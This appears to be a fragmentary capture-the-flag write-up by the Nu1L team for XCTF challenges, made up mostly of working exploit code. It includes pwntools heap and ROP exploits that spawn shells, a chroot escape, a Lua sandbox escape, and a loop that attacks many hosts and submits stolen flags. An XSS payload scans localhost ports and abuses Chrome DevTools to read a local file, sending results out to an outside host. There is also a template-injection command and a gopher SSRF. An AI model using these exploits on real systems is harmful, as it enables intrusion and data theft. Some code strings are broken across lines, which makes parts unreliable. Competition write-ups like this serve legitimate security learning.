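def is_safe_entry(dest_dir: str, name: str) -> bool:
    dest = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(dest, name))
    return target == dest or target.startswith(dest + os.sep)

print(is_safe_entry("/tmp/out", "classes.dex"))            # entry stays inside
print(is_safe_entry("/tmp/out", "../../data/app/x.odex"))  # traversal rejected
```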
Thanks
360 Vulpecker Team:
@RAyH4c
@sniperhg
@zpd2009
Thanks!
App attack-surface notes
1. CSRF
2.
3. Cookie theft
If the Cookie can be read by XSS, the login state is stolen; marking the Cookie HttpOnly stops XSS from reading it.
A malicious HTML/JS page can also redirect the logged-in victim via location.href.
The app's WebView can be opened through a deep link, and the URL it loads is externally controllable:
app://open/?url=http://www.baidu.com
The app's JsBridge exposes native capabilities to the WebView; once the WebView loads an attacker page, that page can invoke native calls:
window.jsBridge.send('{"call": "test"}')
The WebView does check the URL, but the check can be bypassed with a URL such as http://test.com/://aaa.asdqwe.com — the page 404s, yet the payload still runs.
Among the native calls is an http request primitive; its URL is controllable and the request carries the user's Cookie, so the Cookie leaks even though HttpOnly blocks XSS.
Full chain (both the Android and iOS apps are affected):
1. A deep link opens the app's WebView.
2. The URL check is bypassed with ://aaa.asdqwe.com to reach the native calls.
3. The native http call exfiltrates the Cookie.
The URL whitelist regex is:
(^|:\/\/)((((\w|-|\.)+\.)(asdqwe\.(cn|com))))($|[\/\?#]\w*)
Because of the (^|:\/\/) alternative, the pattern matches anywhere a "://aaa.asdqwe.com" substring appears — hence the bypass above.
window.jsBridge.send('{"call": "http", "data": {"url": "xxx", "headers": {"xxx": "xxx"}}}')
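The flaw in the whitelist regex can be demonstrated directly in Python (assuming, as the bypass above implies, a search-style check that passes on a match anywhere in the URL):

```python
# The whitelist regex quoted above; the (^|://) alternative is the flaw.
import re

PATTERN = re.compile(r'(^|:\/\/)((((\w|-|\.)+\.)(asdqwe\.(cn|com))))($|[\/\?#]\w*)')

def is_allowed(url: str) -> bool:
    return PATTERN.search(url) is not None

print(is_allowed("https://aaa.asdqwe.com/page"))        # intended domain passes
print(is_allowed("http://test.com/://aaa.asdqwe.com"))  # bypass also passes
print(is_allowed("http://test.com/page"))               # unrelated URL fails
```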
XCTF WP
AuthorNu1L Team
wpWP
[email protected] 2.0
Nu1L
XCTF WP
lua
BLSMPS
babyjail
babybaes
hardstack
house of pig
hello arm
dngs2010
warmupcms
GSA
apk
Dubbo
space
lamaba
3*3
babydebug
easycms
spider
coturn
lua
local bit_band = bit.band
local bit_lshift = bit.lshift
local bit_rshift = bit.rshift
local math_floor = math.floor
local math_frexp = math.frexp
local math_ldexp = math.ldexp
local math_huge = math.huge
function UInt32sToDouble(low, high)
local negative = false
if high >= 0x80000000 then
negative = true
high = high - 0x80000000
end
local biasedExponent = bit_rshift(bit_band(high, 0x7FF00000), 20)
local mantissa = (bit_band(high, 0x000FFFFF) * 4294967296 + low) / 2 ^ 52
local f
if biasedExponent == 0x0000 then
f = mantissa == 0 and 0 or math_ldexp(mantissa, -1022)
elseif biasedExponent == 0x07FF then
f = mantissa == 0 and math_huge or(math_huge - math_huge)
else
f = math_ldexp(1 + mantissa, biasedExponent - 1023)
end
return negative and -f or f
end
function encode(value)
code = ''
i = 4
while i~=0 do
code = code .. string.char(value%256)
value = value/256
i = i-1
end
return code
end
local function a()
while(1)
do
end
return 1
end
-- 0x40000000 44D7D0
-- 6764A0
local fake =
"\xd0\xd7\x44\x00\xd0\xd7\x44\x00\xd0\xd7\x44\x00\xd0\xd7\x44\x00sh\x00\x00\x00\x00\x00
\x00"..encode(0x044D7E2)..encode(0x044D7E2)..encode(0x044D7E2)
local fa = tonumber( string.format( "%p", fake ), 16 )+ 32
print(encode(fa)) -- 0x451313 451309
local str = "sh\x00\x00\x00\x00\x00\x40"..encode(fa)..encode(fa-1000)..encode(fa-
1000).."\x00\x00\x00\x00"..encode(0x451309).."\x00\x00\x00\x00"..encode(0x451313).."\x0
0\x00\x00\x00aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
print(a)
local address = tonumber( string.format( "%p", str ), 16 )+ 24
print( tonumber( string.format( "%p", str ), 16 ) )
address = UInt32sToDouble( address - 8, 0 )
local func = debug.getinfo( 0, ">f", address ).func
-- print(func)
func("/bin/sh")
BLSMPS
The rogue public-key attack.
https://crypto.stanford.edu/~dabo/pubs/papers/BLSmultisig.html
Use Rust's bls12_381 crate to hash msg = "admin" to a scalar:
use sha2::{Digest};
fn main() {
let digest = sha2::Sha512::digest(b"admin");
let mut tmp : [u8;64] = [0;64];
let mut i = 0;
for d in digest {
tmp[i] = d;
i = i+1
}
let k = bls12_381::Scalar::from_bytes_wide(&tmp);
println!("{}", k);
}
// 0x5aad1e4aa01328f4eb1102b5f5efa77d6b6d78f6b384fa60c4765a9c18362161
babyjail
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <stdlib.h>
#include <ctype.h>
#include <unistd.h>
int main() {
char *shell[2] = {"/bin/sh", NULL};
seteuid(0);
printf("%d\n", chroot("./fuck"));
printf("%d\n", chroot("../../../../../../"));
execve("/bin/sh", shell, NULL);
return 0;
}
babybaes
# -*- coding: utf-8 -*-
from pwn import *
r = lambda x: p.recvuntil(x,drop=True)
s = lambda x,y: p.sendafter(x,y)
sl = lambda x,y: p.sendlineafter(x,y)
context.log_level = 'debug'
p = process('./bayes', env={"LD_PRELOAD":"./libc-2.31.so"})
def create(choice, value=None):
sl('> ', str(1))
sl('[y/n]? ', choice)
if choice=='y':
sl('= ', str(value))
def train(idx, features, labels):
sl('> ', str(2))
sl('? ', str(idx))
sl('finish)\n', features+'\nEND')
sl('labels: \n', labels)
def show(idx):
sl('> ', str(3))
sl('? ', str(idx))
def predict(idx, document):
sl('> ', str(4))
sl('? ', str(idx))
sl(': \n', document)
def remove(idx):
sl('> ', str(5))
sl('? ', str(idx))
create('n') #0
create('n') #1
train(1, ' ', '0')
for i in range(0x50+0x70):
train(1, ' ', '-1')
# show(0)
create('n') #1
create('n') #2
create('n') #3
create('n') #4
create('n') #5
create('n') #6
create('n') #6
create('n') #6
create('n') #6
create('n') #6
create('n') #6
create('n') #6
remove(0)
remove(1)
train(8, ' ', '0')
train(8, ' ', '0')
train(8, ' ', '0')
remove(8)
create('n')
create('n')
predict(10, '\x00'*0xc8+p64(0x461))
remove(3)
create('n')
create('n')
show(4)
r('training data: ')
libc = int(r('\n'),10)-0x1ebbe0
log.info("@ libc: "+hex(libc))
__free_hook = libc+0x1eeb28
log.info("@ __free_hook: "+hex(__free_hook))
system = libc+0x55410
log.info("@ system: "+hex(system))
one = libc+0xe6c81
log.info("@ one: "+hex(one))
remove(6)
remove(5)
predict(10, ('\x00'*0x68+p64(0x71)+p64(__free_hook).ljust(0x180,'\x00')))
create('n')
predict(10, p64(one)+'\x00'*0x50)
p.interactive()
hardstack
from pwn import *
import requests
# TqBkeptm
local = 1
debug = 1
Timeout.default = 2
libc = ELF('./libc-2.27.so')
if debug == 1:
context.log_level = 'debug'
def pwn(p):
def launch_gdb():
if local != 1:
return
context.terminal = ['xfce4-terminal', '-x', 'sh', '-c']
#print(proc.pidof(p)[0])
raw_input()
# gdb.attach(p)
# gdb.attach(proc.pidof(p)[0])
def add(i,size):
p.recvuntil('choice:')
p.sendline('1')
p.recvuntil(':')
p.sendline(str(i))
p.recvuntil(':')
p.sendline(str(size))
def edit(i,d):
p.recvuntil('choice:')
p.sendline('2')
p.recvuntil(':')
p.sendline(str(i))
p.recvuntil(':')
p.sendline(d)
def show(i):
p.recvuntil('choice:')
p.sendline('3')
p.recvuntil(':')
p.sendline(str(i))
def dele(i):
p.recvuntil('choice:')
p.sendline('4')
p.recvuntil(':')
p.sendline(str(i))
def stack_over(s):
payload = 'a' * 0x100 + p64(0x602150) + p64(0x4010a3)+p64(0)*11 +s
p.recvuntil('choice:')
p.sendline('666')
sleep(0.1)
p.sendline(str(len(payload)))
sleep(0.1)
p.send(payload)
def csu_call(addr,p1,p2,p3):
payload = p64(0x40113A)
payload += p64(0) + p64(1) + p64(addr) + p64(p1) + p64(p2) + p64(p3) +
p64(0x00401120)
payload += p64(0) + p64(0xDEADE000 + 0xf00) * 6 + p64(0x400F90)
return payload
'''
00401120 mov rdx, r15
.text:0000000000401123 mov rsi, r14
.text:0000000000401126 mov edi, r13d
.text:0000000000401129 call ds:(funcs_401129 - 601D78h)[r12+rbx*8]
.text:000000000040112D add rbx, 1
.text:0000000000401131 cmp rbp, rbx
.text:0000000000401134 jnz short loc_401120
40113A pop rbx
.text:000000000040113B pop rbp
.text:000000000040113C pop r12
.text:000000000040113E pop r13
.text:0000000000401140 pop r14
.text:0000000000401142 pop r15
.text:0000000000401144 retn
'''
add(0,0x400)
add(1,0x400)
dele(0)
dele(1)
edit(1,p64(0xDEADE000))
add(2,0x400)
add(3,0x400) # 400C24
launch_gdb()
edit(3,p64(0x0000000000000018) + p64(0x40113A)+
p64(0x0000000000401079)+p64(0x0000000000400ed3)+'\n')
stack_over(csu_call(0x601FA0 ,1,0x601FA0,0x10))
p.recvuntil('\x00\x00')
leak_lib = u64(p.recv(8))
log.info(hex(leak_lib))
base = leak_lib - 1631440
edit(3,p64(0x0000000000000018) + p64(0x0000000000401143)+
p64(0x0000000000401079)+p64(0x0000000000400ed3)+'\n')
stack_over(p64(0x0000000000401143) + p64(base + next(libc.search('/bin/sh'))) +
p64(0x0000000000401144) + p64(base + libc.symbols['system']))
ip_list = '172.0.x.12'
port = 0
import sys
import json
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
try:
import httplib
except ImportError:
import http.client as httplib
server_host = '10.10.10.1' # modify this
server_port = 80 # modify this
def my_submit_flag(flag, team_token = '6DnR5NSdrE36bvGtKWaKX95tq8v23UdbRFCMmwuHeVQEQ',
host=server_host, port=server_port, timeout=5):
if not team_token or not flag:
raise Exception('team token or flag not found')
conn = httplib.HTTPConnection(host, port, timeout=timeout)
params = urlencode({
'token': team_token,
'flag': flag,
})
headers = {
"Content-type": "application/x-www-form-urlencoded"
}
conn.request('POST', '/api/v1/att_def/web/submit_flag/?event_id=10', params,
headers)
response = conn.getresponse()
data = response.read()
conn.close()
print(json.loads(data))
return
if __name__ == '__main__':
if local == 1:
# p = process('./hardstack.bak',env = {'LD_PRELOAD':'./libc-2.27.so'})
p = remote('172.35.13.44',9999)
pwn(p)
p.interactive()
else:
while True:
for i in xrange(20):
try:
ip = '172.0.'+str(i+50) + '.12'
p = remote(ip,8888)
context.log_level = 'info'
pwn(p)
context.log_level = 'debug'
p.sendline('echo kkp && cat flag')
# p.interactive()
p.recvuntil('kkp\n',timeout=1)
flag = p.recvline().strip()
print(flag)
my_submit_flag(flag)
p.close()
except Exception:
continue
house of pig
from pwn import *
a1="A@H@x"
a2="Bhg#l"
a3="C3-hB"
context.log_level="debug"
def cmd(s):
p.sendlineafter(": ",str(s))
def cmd1(s):
p.sendafter(": ",str(s))
def add(size,note):
cmd(1)
cmd(size)
cmd1(note)
def delete(index):
cmd(4)
cmd(index)
def show(index):
cmd(2)
cmd(index)
def edit(index,note):
cmd(3)
cmd(index)
cmd1(note)
def change(note):
cmd(5)
p.sendlineafter(":\n",note)
#p=process("./pig")
p=remote("172.35.13.26",8888)
change(a1)
for i in range(8):
add(0xf0,"\n"*5)
for i in range(8):
delete(7-i)
change(a2)
add(0xf0,"\n"*5)
delete(0)
change(a3)
add(0xf0,"\n"*5)
change(a2)
add(0x440,"\n"*(0x430/0x30))
change(a1)
add(0x208,"\n"*(0x208/0x30))
change(a3)
add(0x430,"\n"*(0x430/0x30))
add(0x430,"\n"*(0x430/0x30))
add(0x430,"\n"*(0x430/0x30))
change(a1)
add(0x208,"\n"*(0x208/0x30))
change(a2)
delete(1)
add(0x450,"\n"*(0x450/0x30))
change(a3)
delete(3)
change(a1)
show(3)
p.recvuntil("The message is: ")
heap= u64(p.recv(6)+"\x00\x00")
print hex(heap)#0x5555555707e0
change(a2)
show(1)
p.recvuntil("The message is: ")
libc= u64(p.recv(6)+"\x00\x00")-0x7ffff7db2fe0+0x7ffff7bc7000
print hex(libc)
#gdb.attach(p)
edit(1,p64(libc-0x7ffff7bc7000+0x7ffff7db3628-0x20)*2+"\n"*(0x440/0x30-1))
change(a1)
add(0x410,"\n"*(0x410/0x30))
#gdb.attach(p)
change(a2)
edit(1,p64(heap-0x5555555702b0+0x00005555555706a0)*2+"\n"*(0x440/0x30-1))
change(a3)
delete(1)
add(0x430,("/bin/sh\x00"+p64(libc-0x7ffff7bc7000+0x7ffff7c1c410))*(0x430/0x30))
base=0
ptr=0x100
end=0
buf_base=heap-0x5555555702b0+0x555555570d10
buf_end=heap-0x5555555702b0+0x555555570d10+70
next=heap-0x5555555702b0+0x55555556feb0
fake_jmp=libc-0x7ffff7bc7000+0x7ffff7db4560
payload=p64(0)
payload+=p64(0)+p64(base)+p64(ptr)+p64(end)
payload+=p64(buf_base)+p64(buf_end)+p64(0)*4+p64(next)+p64(1)+p64(0)*12+p64(fake_jmp)
p.sendlineafter(":\n",payload)
change(a1)
edit(1,p64(libc-0x7ffff7bc7000+0x7ffff7db5b28-8)+"\n"*5)
base=0
ptr=0x100
end=0
buf_base=heap-0x5555555702b0+0x555555570df0
buf_end=heap-0x5555555702b0+0x555555570df0+70
next=heap-0x5555555702b0+0x55555556feb0
fake_jmp=libc-0x7ffff7bc7000+0x7ffff7db4560
payload=p64(0)*3
payload+=p64(0)+p64(base)+p64(ptr)+p64(end)
payload+=p64(buf_base)+p64(buf_end)+p64(0)*4+p64(next)+p64(1)+p64(0)*12+p64(fake_jmp)
edit(0,payload[:0x10]+payload[0x30:0x40]+payload[0x60:0x70]+payload[0x90:0xa0]+payload[
0xc0:0xd0])
p.sendline("")
change(a2)
edit(0,payload[0x10:0x20]+payload[0x40:0x50]+payload[0x70:0x80]+payload[0xa0:0xb0]+payl
oad[0xd0:0xe0]+"\n")
change(a3)
edit(0,payload[0x20:0x30]+payload[0x50:0x60]+payload[0x80:0x90]+payload[0xb0:0xc0]+"\n"
*2)
#gdb.attach(p)
p.interactive()
hello arm
from pwn import *
# s = process("qemu-arm -g 1234 -L . ./pwnarm",shell=True)
# s = process("qemu-arm -L . ./pwnarm",shell=True)
s = remote("172.35.13.17","10001")
def cmd(i):
s.sendlineafter("choice:",str(i))
sleep(0.2)
def show(idx):
cmd(2)
s.sendlineafter("index?",str(idx))
sleep(0.2)
def free(idx):
cmd(3)
s.sendlineafter("index?",str(idx))
sleep(0.2)
def edit(idx,size,buf):
cmd(4)
s.sendlineafter("index?",str(idx))
sleep(0.2)
s.sendlineafter("size:",str(size))
sleep(0.2)
s.sendafter("inputs:",buf)
sleep(0.2)
raw_input(">")
cmd(1)
# raw_input(">")
s.sendline("b53efe319540434961065ca81c5887a80ea2")
sizes = []
def dq(s):
a = s % 8
b = s/8
s = b*8
if(a > 4):
s += 8
s += 8
if(s < 0x10):
s = 0x10
return s
for i in range(8):
show(i)
s.recvuntil("size: ")
ss = int(s.recvline(keepends=False))
print hex(ss),
ss = dq(ss)-8
print hex(ss)
sizes.append(ss)
us = 0
for i in range(8):
if(sizes[i] > 0x40 and i > 0 and sizes[i+1] > 0x40):
us = i
break
print(hex(us),hex(sizes[us]),hex(sizes[us+1]))
bss = 0x10000+us*12+4
fake = p32(0)+p32(sizes[us])+p32(bss-12)+p32(bss-8)
fake = fake.ljust(sizes[us],'\x00')
fake += p32(sizes[us])+p32(sizes[us+1]+8)
edit(us,sizes[us]+8+8+8,fake)
free(us+1)
atoi_got = 0x11634
free_got = 0x1163C
puts_plt = 0x85F8
payload = p32(0x10000)+p32(0x100) #us-1
payload += p32(1)+p32(atoi_got)+p32(0x100) #us
payload += p32(1)+p32(free_got)+p32(0x100) #us+1
payload += p32(1)+p32(atoi_got)+p32(0x100) #us+2
edit(us,100,payload)
edit(us+1,4,p32(puts_plt))
free(us+2)
context.arch = 'arm'
libc = ELF("./lib/libc.so.0")
atoi = u32(s.recv(4))
success(hex(atoi))
libc.address = atoi-libc.sym['atoi']
success(hex(libc.address))
system = libc.sym['system']
edit(us,4,p32(system))
cmd("sh;\x00")
s.interactive()
dngs2010
svg xss
Chrome DevTools for eventloop
GET /img/88888888"><%2fimage>
<script>window.location='http:%2f%2f172.35.13.164:8000%2ffuck2.html';<%2fscript>
<image%20fuck=".png
<body>
<script>
const scan = (ip, port) => {
let s = document.createElement("script");
s.src = "http://" + ip + ":" + port;
s.onload = () => {
if(port != 3000){
ID
ws payload for open
fetch("<http://172.35.13.164:8000/?p=>" + port)
for(let i = 0; i < 300000; i++) {
console.log("fuck!!!!");
}
}
};
document.getElementsByTagName('body')[0].appendChild(s);
};
let p = Array.from({length: 10000}, (a, i) => i + 40000);
port = p;
let i = 0;
while(i != p.length){
scan("127.0.0.1", port[i]);
i = i + 1;
}
window.onload = () => {
fetch("<http://172.35.13.164:8000/?windowonload>");
};
</script>
</body>
<html>
<body>
<script>
let port = 41057;
let id = "AA135DEF688970FE0CC30D7E1B36EEB5";
let ws = new WebSocket(`ws://127.0.0.1:${port}/devtools/page/${id}`);
fetch('<http://172.35.13.164:8000/?onwsbegin>');
ws.addEventListener('error', (e) => {
fetch('<http://172.35.13.164:8000/?onwserror=>' + encodeURIComponent(e));
});
ws.addEventListener('close', (e) => {
fetch('<http://172.35.13.164:8000/?onwsclosed=>' +
encodeURIComponent(e.reason));
});
ws.addEventListener('open', (e) => {
fetch('<http://172.35.13.164:8000/?onwsopen>');
ws.send(JSON.stringify({id: 0, method: 'Page.navigate', params: {url:
'file:///flag'}}));
ws.send(JSON.stringify({id: 1, method: 'Runtime.evaluate', params: {expression:
'document.documentElement.outerHTML'}}));
});
ws.addEventListener('message', (e) => {
fetch('<http://172.35.13.164:8000/?onwsdata=>' +
btoa(encodeURIComponent(JSON.stringify(e.data))));
});
fetch('<http://172.35.13.164:8000/?onwsend1>');
for(let i = 0; i < 5000; i++) {
console.log("fuck!");
}
fetch('<http://172.35.13.164:8000/?onwsend2>');
</script>
</body>
</html>
warmupcms
<!--{if $name==system('/readflag')}-->
<!--{/if}-->
GSA
from Crypto.Util.number import *
from string import ascii_letters, digits
table = ascii_letters+digits
from pwn import *
def rational_to_contfrac(x, y):
a = x//y
pquotients = [a]
while a * y != x:
x, y = y, x-a*y
a = x//y
pquotients.append(a)
return pquotients
def convergents_from_contfrac(frac):
convs = []
for i in range(len(frac)):
convs.append(contfrac_to_rational(frac[0:i]))
return convs
def contfrac_to_rational(frac):
if len(frac) == 0:
return (0, 1)
num = frac[-1]
denom = 1
for _ in range(-2, -len(frac)-1, -1):
num, denom = frac[_]*num+denom, num
return (num, denom)
def bitlength(x):
assert x >= 0
n = 0
while x > 0:
n = n+1
x = x >> 1
return n
def isqrt(n):
if n < 0:
raise ValueError('square root not defined for negative numbers')
if n == 0:
return 0
a, b = divmod(bitlength(n), 2)
x = 2**(a+b)
while True:
y = (x + n//x)//2
if y >= x:
return x
x = y
def is_perfect_square(n):
h = n & 0xF
if h > 9:
return -1
if (h != 2 and h != 3 and h != 5 and h != 6 and h != 7 and h != 8):
t = isqrt(n)
if t*t == n:
return t
else:
return -1
return -1
def sqrt(n):
l = 0
r = n
while(r-l>1):
m = (r+l)//2
if(m*m>n):
r = m
else:
l = m
return l
def hack_RSA(e, p):
frac = rational_to_contfrac(e, p)
convergents = convergents_from_contfrac(frac)
for (k, d) in convergents:
if(d.bit_length() in range(510,515)):
phi = e*d//k
delta = n*n-phi+1
s = delta+2*n
m = sqrt(s)
if(m%2==1):
m = m+1
if(m*m==s):
print(m)
di = sqrt(delta-2*n)
if(di%2==1):
di = di+1
return (m-di)//2
s = remote("172.35.13.13","10002")
s.recvuntil("sha256(XXX+")
d = s.recvuntil(")",drop=True)
s.recvuntil("== ")
x = s.recvline(keepends=False)
ans = ''
for i in range(1):
for j in range(62):
for k in range(62):
for l in range(62):
data=table[j]+table[k]+table[l]+d
data_sha = hashlib.sha256(data.encode('ascii')).hexdigest()
if (data_sha==x):
ans = table[j]+table[k]+table[l]
print ans
break
s.sendlineafter("Give me XXX:",ans)
s.recvuntil("n = ")
n = int(s.recvuntil("e",drop=True).replace("\n",""))
s.recvuntil("= ")
e = int(s.recvuntil("choice",drop=True).replace("\n",""))
p = n*n-5*n
#print(p)
d = hack_RSA(e, p)
print(d,n%d)
from hashlib import sha1
print(sha1(long_to_bytes(d)).hexdigest())
s.interactive()
apk
package com.company;
import com.sun.org.apache.xml.internal.security.exceptions.Base64DecodingException;
import com.sun.org.apache.xml.internal.security.utils.Base64;
import javax.crypto.Cipher;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.lang.reflect.Array;
import java.lang.reflect.InvocationTargetException;
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.security.Key;
import java.security.MessageDigest;
import java.util.Arrays;
public class Main {
private static int transform(byte temp) {
int tempInt = temp;
if(tempInt < 0) {
tempInt += 0x100;
}
return tempInt;
}
private static byte[] intToByte(int[] content, int offset) {
byte[] result = new byte[content.length << 2];
int i = 0;
int j;
for(j = offset; j < result.length; j += 4) {
result[j + 3] = (byte)(content[i] & 0xFF);
result[j + 2] = (byte)(content[i] >> 8 & 0xFF);
result[j + 1] = (byte)(content[i] >> 16 & 0xFF);
result[j] = (byte)(content[i] >> 24 & 0xFF);
++i;
}
return result;
}
private static int[] byteToInt(byte[] content, int offset) {
int[] result = new int[content.length >> 2];
int i = 0;
int j;
for(j = offset; j < content.length; j += 4) {
result[i] = transform(content[j + 3]) | transform(content[j + 2]) << 8 |
transform(content[j + 1]) << 16 | content[j] << 24;
++i;
}
return result;
}
public static byte[] ooxx(byte[] content, int offset, int[] ooxxooxxoo) {
int[] tempInt = byteToInt(content, offset);
int y = tempInt[0];
int z = tempInt[1];
int sum = 0;
int a = ooxxooxxoo[0];
int b = ooxxooxxoo[1];
int c = ooxxooxxoo[2];
int d = ooxxooxxoo[3];
int i;
for(i = 0; i < 0x20; ++i) {
sum += 305419896;
y += (z << 4) + a ^ z + sum ^ (z >> 5) + b;
z += (y << 4) + c ^ y + sum ^ (y >> 5) + d;
// System.out.println(y);
// System.out.println(z);
}
tempInt[0] = y;
tempInt[1] = z;
// System.out.println("-----------");
// System.out.println(y);
// System.out.println(z);
return intToByte(tempInt, 0);
}
public static byte[] dec11(byte[] content, int offset, int[] ooxxooxxoo) {
int[] tempInt = byteToInt(content, offset);
int y = tempInt[0];
int z = tempInt[1];
// System.out.println("-----------");
// System.out.println(y);
// System.out.println(z);
int sum = 0;
for(int jj = 0;jj<0x20;jj++)
{
sum += 305419896;
}
int a = ooxxooxxoo[0];
int b = ooxxooxxoo[1];
int c = ooxxooxxoo[2];
int d = ooxxooxxoo[3];
int i;
for(i = 0; i < 0x20; ++i) {
// sum += 305419896;
//// y += (z << 4) + a ^ z + sum ^ (z >> 5) + b;
//// z += (y << 4) + c ^ y + sum ^ (y >> 5) + d;
// System.out.println(y);
// System.out.println(z);
z -= (y << 4) + c ^ y + sum ^ (y >> 5) + d;
y -= (z << 4) + a ^ z + sum ^ (z >> 5) + b;
sum -= 305419896;
}
tempInt[0] = y;
tempInt[1] = z;
return intToByte(tempInt, 0);
}
public static byte[] de11(byte[] info) {
String ooxxooxxoo = "youaresoclever!!";
int j;
for(j = 0; j < 16; ++j) {
ooxxooxxoo = ooxxooxxoo + "!";
}
byte[] ooxxooxxooarray = ooxxooxxoo.getBytes();
int[] ooxxooxxooxx = new int[16];
int i;
for(i = 0; i < 16; ++i) {
ooxxooxxooxx[i] = ooxxooxxooarray[i];
}
if(info.length % 8 != 0) {
return null;
}
byte[] result = new byte[info.length];
int offset;
for(offset = 0; offset < result.length; offset += 8) {
System.arraycopy(dec11(info, offset, ooxxooxxooxx), 0, result, offset, 8);
}
return result;
}
public static byte[] dec22(byte[] content, int offset, int[] ooxxooxxoo) {
int[] tempInt = byteToInt(content, offset);
int y = tempInt[0];
int z = tempInt[1];
// System.out.println("-----------");
// System.out.println(y);
// System.out.println(z);
int sum = 0;
for(int jj = 0;jj<0x20;jj++)
{
sum += 0x515374A1;
}
int a = ooxxooxxoo[0];
int b = ooxxooxxoo[1];
int c = ooxxooxxoo[2];
int d = ooxxooxxoo[3];
int i;
for(i = 0; i < 0x20; ++i) {
// sum += 305419896;
//// y += (z << 4) + a ^ z + sum ^ (z >> 5) + b;
//// z += (y << 4) + c ^ y + sum ^ (y >> 5) + d;
// System.out.println(y);
// System.out.println(z);
z -= (y << 4) + c ^ y + sum ^ (y >> 5) + d;
y -= (z << 4) + a ^ z + sum ^ (z >> 5) + b;
sum -= 0x515374A1;
}
tempInt[0] = y;
tempInt[1] = z;
return intToByte(tempInt, 0);
}
public static byte[] de22(byte[] info) {
String ooxxooxxoo = "zipMatcher";
int j;
for(j = 0; j < 16; ++j) {
ooxxooxxoo = ooxxooxxoo + "!";
}
byte[] ooxxooxxooarray = ooxxooxxoo.getBytes();
int[] ooxxooxxooxx = new int[16];
int i;
for(i = 0; i < 16; ++i) {
ooxxooxxooxx[i] = ooxxooxxooarray[i];
}
if(info.length % 8 != 0) {
return null;
}
byte[] result = new byte[info.length];
int offset;
for(offset = 0; offset < result.length; offset += 8) {
System.arraycopy(dec22(info, offset, ooxxooxxooxx), 0, result, offset, 8);
}
return result;
}
public static byte[] encrypt1(byte[] info) {
String ooxxooxxoo = "youaresoclever!!";
int j;
for(j = 0; j < 16; ++j) {
ooxxooxxoo = ooxxooxxoo + "!";
}
byte[] ooxxooxxooarray = ooxxooxxoo.getBytes();
int[] ooxxooxxooxx = new int[16];
int i;
for(i = 0; i < 16; ++i) {
ooxxooxxooxx[i] = ooxxooxxooarray[i];
}
if(info.length % 8 != 0) {
return null;
}
byte[] result = new byte[info.length];
int offset;
for(offset = 0; offset < result.length; offset += 8) {
System.arraycopy(ooxx(info, offset, ooxxooxxooxx), 0, result, offset, 8);
}
return result;
}
private static final char[] HEX_ARRAY = "0123456789ABCDEF".toCharArray();
public static String bytesToHex(byte[] bytes) {
char[] hexChars = new char[bytes.length * 2];
for (int j = 0; j < bytes.length; j++) {
int v = bytes[j] & 0xFF;
hexChars[j * 2] = HEX_ARRAY[v >>> 4];
hexChars[j * 2 + 1] = HEX_ARRAY[v & 0x0F];
}
return new String(hexChars);
}
public static byte[] hexStringToByteArray(String s) {
int len = s.length();
byte[] data = new byte[len / 2];
for (int i = 0; i < len; i += 2) {
data[i / 2] = (byte) ((Character.digit(s.charAt(i), 16) << 4)
+ Character.digit(s.charAt(i+1), 16));
}
return data;
}
public static void main(String[] args) throws Exception {
byte[] a = Base64.decode("IgMDcaHeDcHTRr1SUS7urw==");
System.out.println(new String(de11(encrypt1("1234567890123456".getBytes()))));
byte[] c = de22(a);
System.out.println(bytesToHex(c));
//aes.decrypt('097DB71BC22864FA79E182190DA7B039'.decode('hex')).encode('hex')
byte[] d = hexStringToByteArray("acbdcb5bb9db3cd99fbe1f7a83301f82");
byte[] e = de11(d);
System.out.println(bytesToHex(e));
}
}
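For cross-checking the round function outside the JVM, the TEA-style cipher above can be sketched in Python. This is only a sketch under assumptions: the byte order of byteToInt and the use of unsigned shifts (Java's `>>` is a signed shift) are guesses, so the structure is claimed, not bit-exact output; the pair below is self-consistent, so encrypt followed by decrypt round-trips.

```python
import struct

DELTA = 0x515374A1   # the challenge's custom delta, not TEA's 0x9E3779B9
MASK = 0xFFFFFFFF    # keep all arithmetic in 32 bits

def tea_encrypt_block(block: bytes, key) -> bytes:
    # block: 8 bytes; key: four 32-bit ints (a, b, c, d), big-endian assumed
    y, z = struct.unpack('>2I', block)
    a, b, c, d = key
    s = 0
    for _ in range(32):
        s = (s + DELTA) & MASK
        y = (y + ((((z << 4) + a) ^ (z + s) ^ ((z >> 5) + b)))) & MASK
        z = (z + ((((y << 4) + c) ^ (y + s) ^ ((y >> 5) + d)))) & MASK
    return struct.pack('>2I', y, z)

def tea_decrypt_block(block: bytes, key) -> bytes:
    # mirrors dec22 above: start from sum = 32 * DELTA and undo the
    # rounds in reverse order (z first, then y, then decrement sum)
    y, z = struct.unpack('>2I', block)
    a, b, c, d = key
    s = (DELTA * 32) & MASK
    for _ in range(32):
        z = (z - ((((y << 4) + c) ^ (y + s) ^ ((y >> 5) + d)))) & MASK
        y = (y - ((((z << 4) + a) ^ (z + s) ^ ((z >> 5) + b)))) & MASK
        s = (s - DELTA) & MASK
    return struct.pack('>2I', y, z)
```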
The Dubbo provider registers itself with zookeeper, and the consumer fetches the provider's address from zookeeper, so the SSRF only needs to reach the zookeeper port.

space

The constraints dumped from the program were solved with python z3.
GET /?
url=gopher://10.0.20.11:2181/_%2500%2500%2500%252d%2500%2500%2500%2500%2500%2500%2500%2
500%2500%2500%2500%2500%2500%2500%2575%2530%2500%2500%2500%2500%2500%2500%2500%2500%250
0%2500%2500%2510%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%
2500%2500%2500%2500%2500%2500%250e%2500%2500%2500%2501%2500%2500%2500%250c%2500%2500%25
00%2501%252f%2500 HTTP/1.1
Host: 172.35.13.101:8090
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,
